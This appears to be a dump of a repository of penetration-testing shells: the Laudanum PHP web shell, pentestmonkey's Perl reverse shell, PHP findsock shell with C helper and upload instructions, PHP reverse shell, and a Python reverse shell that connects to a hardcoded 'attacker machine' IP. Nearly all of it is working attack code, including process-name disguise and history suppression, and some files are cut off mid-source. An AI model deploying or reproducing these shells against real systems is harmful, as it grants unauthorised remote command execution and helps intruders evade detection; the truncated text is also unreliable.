| /* Initialize the session variables. */ 149 | if (empty($_SESSION['cwd'])) { 150 | $_SESSION['cwd'] = '.'; 151 | $_SESSION['history'] = array(); 152 | $_SESSION['output'] = ''; 153 | } 154 | 155 | if (!empty($command)) { 156 | /* Save the command for late use in the JavaScript. If the command is 157 | * already in the history, then the old entry is removed before the 158 | * new entry is put into the list at the front. */ 159 | if (($i = array_search($command, $_SESSION['history'])) !== false) 160 | unset($_SESSION['history'][$i]); 161 | 162 | array_unshift($_SESSION['history'], $command); 163 | 164 | /* Now append the commmand to the output. */ 165 | $_SESSION['output'] .= '$ ' . $command . "\n"; 166 | 167 | /* Initialize the current working directory. */ 168 | if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) { 169 | $_SESSION['cwd'] = realpath($ini['settings']['home-directory']); 170 | } elseif (preg_match('/^[[:blank:]]*cd[[:blank:]]+([^;]+)$/', $command, $regs)) { 171 | /* The current command is a 'cd' command which we have to handle 172 | * as an internal shell command. */ 173 | 174 | if ($regs[1]{0} == '/') { 175 | /* Absolute path, we use it unchanged. */ 176 | $new_dir = $regs[1]; 177 | } else { 178 | /* Relative path, we append it to the current working 179 | * directory. */ 180 | $new_dir = $_SESSION['cwd'] . '/' . $regs[1]; 181 | } 182 | 183 | /* Transform '/./' into '/' */ 184 | while (strpos($new_dir, '/./') !== false) 185 | $new_dir = str_replace('/./', '/', $new_dir); 186 | 187 | /* Transform '//' into '/' */ 188 | while (strpos($new_dir, '//') !== false) 189 | $new_dir = str_replace('//', '/', $new_dir); 190 | 191 | /* Transform 'x/..' into '' */ 192 | while (preg_match('|/\.\.(?!\.)|', $new_dir)) 193 | $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir); 194 | 195 | if ($new_dir == '') $new_dir = '/'; 196 | 197 | /* Try to change directory. */ 198 | if (@chdir($new_dir)) { 199 | $_SESSION['cwd'] = $new_dir; 200 | } else { 201 | $_SESSION['output'] .= "cd: could not change to: $new_dir\n"; 202 | } 203 | 204 | } elseif (trim($command) == 'exit') { 205 | logout(); 206 | } else { 207 | 208 | /* The command is not an internal command, so we execute it after 209 | * changing the directory and save the output. */ 210 | chdir($_SESSION['cwd']); 211 | 212 | // We canot use putenv() in safe mode. 213 | if (!ini_get('safe_mode')) { 214 | // Advice programs (ls for example) of the terminal size. 215 | putenv('ROWS=' . $rows); 216 | putenv('COLUMNS=' . $columns); 217 | } 218 | 219 | /* Alias expansion. */ 220 | $length = strcspn($command, " \t"); 221 | $token = substr($command, 0, $length); 222 | if (isset($ini['aliases'][$token])) 223 | $command = $ini['aliases'][$token] . substr($command, $length); 224 | 225 | $io = array(); 226 | $p = proc_open($command, 227 | array(1 => array('pipe', 'w'), 228 | 2 => array('pipe', 'w')), 229 | $io); 230 | 231 | /* Read output sent to stdout. */ 232 | while (!feof($io[1])) { 233 | $_SESSION['output'] .= htmlspecialchars(fgets($io[1]), 234 | ENT_COMPAT, 'UTF-8'); 235 | } 236 | /* Read output sent to stderr. */ 237 | while (!feof($io[2])) { 238 | $_SESSION['output'] .= htmlspecialchars(fgets($io[2]), 239 | ENT_COMPAT, 'UTF-8'); 240 | } 241 | 242 | fclose($io[1]); 243 | fclose($io[2]); 244 | proc_close($p); 245 | } 246 | } 247 | 248 | /* Build the command history for use in the JavaScript */ 249 | if (empty($_SESSION['history'])) { 250 | $js_command_hist = '""'; 251 | } else { 252 | $escaped = array_map('addslashes', $_SESSION['history']); 253 | $js_command_hist = '"", "' . implode('", "', $escaped) . '"'; 254 | } 255 | } 256 | 257 | ?> 258 | 260 | 261 | 262 | Laudanum Shell 263 | 264 | 265 | 303 | 304 | 305 | 306 | 307 |

Laudanum Shell

308 | 309 |
310 | 311 | 320 | 321 |
322 | Authentication 323 | 324 | Login failed, please try again:

' . "\n"; 327 | else 328 | echo "

Please login:

\n"; 329 | ?> 330 | 331 |

Username:

333 | 334 |

Password:

335 | 336 |

337 | 338 | 339 | 340 |
341 | 342 | 343 | 344 |
345 | Current Working Directory: 348 | 349 | 350 |
351 | 358 |

359 | $  361 |

362 |
363 | 364 |

365 | Size: × 369 | 370 | 371 | 372 |

373 | 374 |
375 | 376 | 377 | 378 |
379 | 380 | 381 |
382 |
383 | Copyright © 2014, Kevin Johnson and the Laudanum team.
384 | Updated by Tim Medin.
385 | Get the latest version at laudanum.secureideas.net. 386 |
387 | 388 | 389 | 390 | -------------------------------------------------------------------------------- /perl-reverse-shell-1.0/CHANGELOG: -------------------------------------------------------------------------------- 1 | 2 | 2007-05-26 perl-reverse-shell v1.0 3 | 4 | * Initial public release 5 | 6 | -------------------------------------------------------------------------------- /perl-reverse-shell-1.0/COPYING.PERL-REVERSE-SHELL: -------------------------------------------------------------------------------- 1 | This tool may be used for legal purposes only. Users take full responsibility 2 | for any actions performed using this tool. The author accepts no liability for 3 | damage caused by this tool. If these terms are not acceptable to you, then do 4 | not use this tool. 5 | 6 | In all other respects the GPL version 2 applies. 7 | -------------------------------------------------------------------------------- /perl-reverse-shell-1.0/perl-reverse-shell.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl -w 2 | # perl-reverse-shell - A Reverse Shell implementation in PERL 3 | # Copyright (C) 2006 pentestmonkey@pentestmonkey.net 4 | # 5 | # This tool may be used for legal purposes only. Users take full responsibility 6 | # for any actions performed using this tool. The author accepts no liability 7 | # for damage caused by this tool. If these terms are not acceptable to you, then 8 | # do not use this tool. 9 | # 10 | # In all other respects the GPL version 2 applies: 11 | # 12 | # This program is free software; you can redistribute it and/or modify 13 | # it under the terms of the GNU General Public License version 2 as 14 | # published by the Free Software Foundation. 15 | # 16 | # This program is distributed in the hope that it will be useful, 17 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 18 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 19 | # GNU General Public License for more details. 20 | # 21 | # You should have received a copy of the GNU General Public License along 22 | # with this program; if not, write to the Free Software Foundation, Inc., 23 | # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. 24 | # 25 | # This tool may be used for legal purposes only. Users take full responsibility 26 | # for any actions performed using this tool. If these terms are not acceptable to 27 | # you, then do not use this tool. 28 | # 29 | # You are encouraged to send comments, improvements or suggestions to 30 | # me at pentestmonkey@pentestmonkey.net 31 | # 32 | # Description 33 | # ----------- 34 | # This script will make an outbound TCP connection to a hardcoded IP and port. 35 | # The recipient will be given a shell running as the current user (apache normally). 36 | # 37 | 38 | use strict; 39 | use Socket; 40 | use FileHandle; 41 | use POSIX; 42 | my $VERSION = "1.0"; 43 | 44 | # Where to send the reverse shell. Change these. 45 | my $ip = '127.0.0.1'; 46 | my $port = 1234; 47 | 48 | # Options 49 | my $daemon = 1; 50 | my $auth = 0; # 0 means authentication is disabled and any 51 | # source IP can access the reverse shell 52 | my $authorised_client_pattern = qr(^127\.0\.0\.1$); 53 | 54 | # Declarations 55 | my $global_page = ""; 56 | my $fake_process_name = "/usr/sbin/apache"; 57 | 58 | # Change the process name to be less conspicious 59 | $0 = "[httpd]"; 60 | 61 | # Authenticate based on source IP address if required 62 | if (defined($ENV{'REMOTE_ADDR'})) { 63 | cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}"); 64 | 65 | if ($auth) { 66 | unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) { 67 | cgiprint("ERROR: Your client isn't authorised to view this page"); 68 | cgiexit(); 69 | } 70 | } 71 | } elsif ($auth) { 72 | cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address. Denying access"); 73 | cgiexit(0); 74 | } 75 | 76 | # Background and dissociate from parent process if required 77 | if ($daemon) { 78 | my $pid = fork(); 79 | if ($pid) { 80 | cgiexit(0); # parent exits 81 | } 82 | 83 | setsid(); 84 | chdir('/'); 85 | umask(0); 86 | } 87 | 88 | # Make TCP connection for reverse shell 89 | socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp')); 90 | if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) { 91 | cgiprint("Sent reverse shell to $ip:$port"); 92 | cgiprintpage(); 93 | } else { 94 | cgiprint("Couldn't open reverse shell to $ip:$port: $!"); 95 | cgiexit(); 96 | } 97 | 98 | # Redirect STDIN, STDOUT and STDERR to the TCP connection 99 | open(STDIN, ">&SOCK"); 100 | open(STDOUT,">&SOCK"); 101 | open(STDERR,">&SOCK"); 102 | $ENV{'HISTFILE'} = '/dev/null'; 103 | system("w;uname -a;id;pwd"); 104 | exec({"/bin/sh"} ($fake_process_name, "-i")); 105 | 106 | # Wrapper around print 107 | sub cgiprint { 108 | my $line = shift; 109 | $line .= "

\n"; 110 | $global_page .= $line; 111 | } 112 | 113 | # Wrapper around exit 114 | sub cgiexit { 115 | cgiprintpage(); 116 | exit 0; # 0 to ensure we don't give a 500 response. 117 | } 118 | 119 | # Form HTTP response using all the messages gathered by cgiprint so far 120 | sub cgiprintpage { 121 | print "Content-Length: " . length($global_page) . "\r 122 | Connection: close\r 123 | Content-Type: text\/html\r\n\r\n" . $global_page; 124 | } 125 | -------------------------------------------------------------------------------- /php-findsock-shell-1.0/CHANGELOG: -------------------------------------------------------------------------------- 1 | 2 | 2007-09-02 php-findsock-shell v1.0 3 | 4 | * Initial public release 5 | 6 | -------------------------------------------------------------------------------- /php-findsock-shell-1.0/COPYING.PHP-FINDSOCK-SHELL: -------------------------------------------------------------------------------- 1 | This tool may be used for legal purposes only. Users take full responsibility 2 | for any actions performed using this tool. The author accepts no liability for 3 | damage caused by this tool. If these terms are not acceptable to you, then do 4 | not use this tool. 5 | 6 | In all other respects the GPL version 2 applies. 7 | -------------------------------------------------------------------------------- /php-findsock-shell-1.0/findsock.c: -------------------------------------------------------------------------------- 1 | // php-findsock-shell - A Findsock Shell implementation in PHP + C 2 | // Copyright (C) 2007 pentestmonkey@pentestmonkey.net 3 | // 4 | // This tool may be used for legal purposes only. Users take full responsibility 5 | // for any actions performed using this tool. The author accepts no liability 6 | // for damage caused by this tool. If these terms are not acceptable to you, then 7 | // do not use this tool. 8 | // 9 | // In all other respects the GPL version 2 applies: 10 | // 11 | // This program is free software; you can redistribute it and/or modify 12 | // it under the terms of the GNU General Public License version 2 as 13 | // published by the Free Software Foundation. 14 | // 15 | // This program is distributed in the hope that it will be useful, 16 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 17 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 18 | // GNU General Public License for more details. 19 | // 20 | // You should have received a copy of the GNU General Public License along 21 | // with this program; if not, write to the Free Software Foundation, Inc., 22 | // 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. 23 | // 24 | // You are encouraged to send comments, improvements or suggestions to 25 | // me at pentestmonkey@pentestmonkey.net 26 | // 27 | // Description 28 | // ----------- 29 | // (Pair of) Web server scripts that find the TCP socket being used by the 30 | // client to connect to the web server and attaches a shell to it. This 31 | // provides you, the pentester, with a fully interactive shell even if the 32 | // Firewall is performing proper ingress and egress filtering. 33 | // 34 | // Proper interactive shells are more useful than web-based shell in some 35 | // circumstances, e.g: 36 | // 1: You want to change your user with "su" 37 | // 2: You want to upgrade your shell using a local exploit 38 | // 3: You want to log into another system using telnet / ssh 39 | // 40 | // Limitations 41 | // ----------- 42 | // The shell traffic doesn't look much like HTTP, so I guess that you may 43 | // have problems if the site is being protected by a Layer 7 (Application layer) 44 | // Firewall. 45 | // 46 | // The shell isn't fully implemented in PHP: you also need to upload a 47 | // C program. You need to either: 48 | // 1: Compile the program for the appropriate OS / architecture then 49 | // upload it; or 50 | // 2: Upload the source and hope there's a C compiler installed. 51 | // 52 | // This is a pain, but I couldn't figure out how to implement the findsock 53 | // mechanism in PHP. Email me if you manage it. I'd love to know. 54 | // 55 | // Only tested on x86 / amd64 Gentoo Linux. 56 | // 57 | // Usage 58 | // ----- 59 | // See http://pentestmonkey.net/tools/php-findsock-shell if you get stuck. 60 | // 61 | // Here are some brief instructions. 62 | // 63 | // 1: Compile findsock.c for use on the target web server: 64 | // $ gcc -o findsock findsock.c 65 | // 66 | // Bear in mind that the web server might be running a different OS / architecture to you. 67 | // 68 | // 2: Upload "php-findsock-shell.php" and "findsock" binary to the web server using 69 | // whichever upload vulnerability you've indentified. Both should be uploaded to the 70 | // same directory. 71 | // 72 | // 3: Run the shell from a netcat session (NOT a browser - remember this is an 73 | // interactive shell). 74 | // 75 | // $ nc -v target 80 76 | // target [10.0.0.1] 80 (http) open 77 | // GET /php-findsock-shell.php HTTP/1.0 78 | // 79 | // sh-3.2$ id 80 | // uid=80(apache) gid=80(apache) groups=80(apache) 81 | // sh-3.2$ 82 | // ... you now have an interactive shell ... 83 | // 84 | 85 | #include 86 | #include 87 | #include 88 | #include 89 | #include 90 | #include 91 | 92 | int main (int argc, char** argv) { 93 | // Usage message 94 | if (argc != 3) { 95 | printf("Usage: findsock ip port\n"); 96 | exit(0); 97 | } 98 | 99 | // Process args 100 | char *sock_ip = argv[1]; 101 | char *sock_port = argv[2]; 102 | 103 | // Declarations 104 | struct sockaddr_in rsa; 105 | struct sockaddr_in lsa; 106 | int size = sizeof(rsa); 107 | char remote_ip[30]; 108 | int fd; 109 | 110 | // Inspect all file handles 111 | for (fd=3; fd 89 | 90 | -------------------------------------------------------------------------------- /php-reverse-shell-1.0/CHANGELOG: -------------------------------------------------------------------------------- 1 | 2 | 2007-05-26 php-reverse-shell v1.0 3 | 4 | * Initial public release 5 | 6 | -------------------------------------------------------------------------------- /php-reverse-shell-1.0/COPYING.PHP-REVERSE-SHELL: -------------------------------------------------------------------------------- 1 | This tool may be used for legal purposes only. Users take full responsibility 2 | for any actions performed using this tool. The author accepts no liability for 3 | damage caused by this tool. If these terms are not acceptable to you, then do 4 | not use this tool. 5 | 6 | In all other respects the GPL version 2 applies. 7 | -------------------------------------------------------------------------------- /php-reverse-shell-1.0/php-reverse-shell.php: -------------------------------------------------------------------------------- 1 | array("pipe", "r"), // stdin is a pipe that the child will read from 109 | 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 110 | 2 => array("pipe", "w") // stderr is a pipe that the child will write to 111 | ); 112 | 113 | $process = proc_open($shell, $descriptorspec, $pipes); 114 | 115 | if (!is_resource($process)) { 116 | printit("ERROR: Can't spawn shell"); 117 | exit(1); 118 | } 119 | 120 | // Set everything to non-blocking 121 | // Reason: Occsionally reads will block, even though stream_select tells us they won't 122 | stream_set_blocking($pipes[0], 0); 123 | stream_set_blocking($pipes[1], 0); 124 | stream_set_blocking($pipes[2], 0); 125 | stream_set_blocking($sock, 0); 126 | 127 | printit("Successfully opened reverse shell to $ip:$port"); 128 | 129 | while (1) { 130 | // Check for end of TCP connection 131 | if (feof($sock)) { 132 | printit("ERROR: Shell connection terminated"); 133 | break; 134 | } 135 | 136 | // Check for end of STDOUT 137 | if (feof($pipes[1])) { 138 | printit("ERROR: Shell process terminated"); 139 | break; 140 | } 141 | 142 | // Wait until a command is end down $sock, or some 143 | // command output is available on STDOUT or STDERR 144 | $read_a = array($sock, $pipes[1], $pipes[2]); 145 | $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); 146 | 147 | // If we can read from the TCP socket, send 148 | // data to process's STDIN 149 | if (in_array($sock, $read_a)) { 150 | if ($debug) printit("SOCK READ"); 151 | $input = fread($sock, $chunk_size); 152 | if ($debug) printit("SOCK: $input"); 153 | fwrite($pipes[0], $input); 154 | } 155 | 156 | // If we can read from the process's STDOUT 157 | // send data down tcp connection 158 | if (in_array($pipes[1], $read_a)) { 159 | if ($debug) printit("STDOUT READ"); 160 | $input = fread($pipes[1], $chunk_size); 161 | if ($debug) printit("STDOUT: $input"); 162 | fwrite($sock, $input); 163 | } 164 | 165 | // If we can read from the process's STDERR 166 | // send data down tcp connection 167 | if (in_array($pipes[2], $read_a)) { 168 | if ($debug) printit("STDERR READ"); 169 | $input = fread($pipes[2], $chunk_size); 170 | if ($debug) printit("STDERR: $input"); 171 | fwrite($sock, $input); 172 | } 173 | } 174 | 175 | fclose($sock); 176 | fclose($pipes[0]); 177 | fclose($pipes[1]); 178 | fclose($pipes[2]); 179 | proc_close($process); 180 | 181 | // Like print, but does nothing if we've daemonised ourself 182 | // (I can't figure out how to redirect STDOUT like a proper daemon) 183 | function printit ($string) { 184 | if (!$daemon) { 185 | print "$string\n"; 186 | } 187 | } 188 | 189 | ?> 190 | 191 | 192 | 193 | -------------------------------------------------------------------------------- /simple_py_shell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # imports here 3 | # Copyright 2012 TrustedSec, LLC. All rights reserved. 4 | # 5 | # This piece of software code is licensed under the FreeBSD license.. 6 | # 7 | # Visit http://www.freebsd.org/copyright/freebsd-license.html for more information. 8 | import socket,subprocess 9 | HOST = '172.16.32.137' # The remote host 10 | PORT = 443 # The same port as used by the server 11 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 12 | # connect to attacker machine 13 | s.connect((HOST, PORT)) 14 | # send we are connected 15 | s.send('[*] Connection Established!') 16 | # start loop 17 | while 1: 18 | # recieve shell command 19 | data = s.recv(1024) 20 | # if its quit, then break out and close socket 21 | if data == "quit": break 22 | # do shell command 23 | proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) 24 | # read output 25 | stdout_value = proc.stdout.read() + proc.stderr.read() 26 | # send output to attacker 27 | s.send(stdout_value) 28 | # close socket 29 | s.close() 30 | --------------------------------------------------------------------------------